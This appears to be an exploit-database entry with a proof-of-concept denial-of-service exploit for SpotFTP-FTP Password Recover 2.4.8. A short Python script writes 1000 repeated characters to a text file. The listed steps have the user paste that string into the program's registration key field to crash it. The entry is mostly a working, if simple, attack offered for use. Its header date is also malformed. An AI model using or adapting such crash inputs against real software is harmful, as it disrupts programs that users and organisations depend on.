SpotFTP-FTP Password Recover version 2.4.8 suffers from a denial of service vulnerability.
5e41cf6c43c67e460d79ebf01edc185c230c3d47dcc1b268f45f86d884c4fad9
# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)
buffer = 'Z' * 1000
try:
file = open("RandomLetter.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")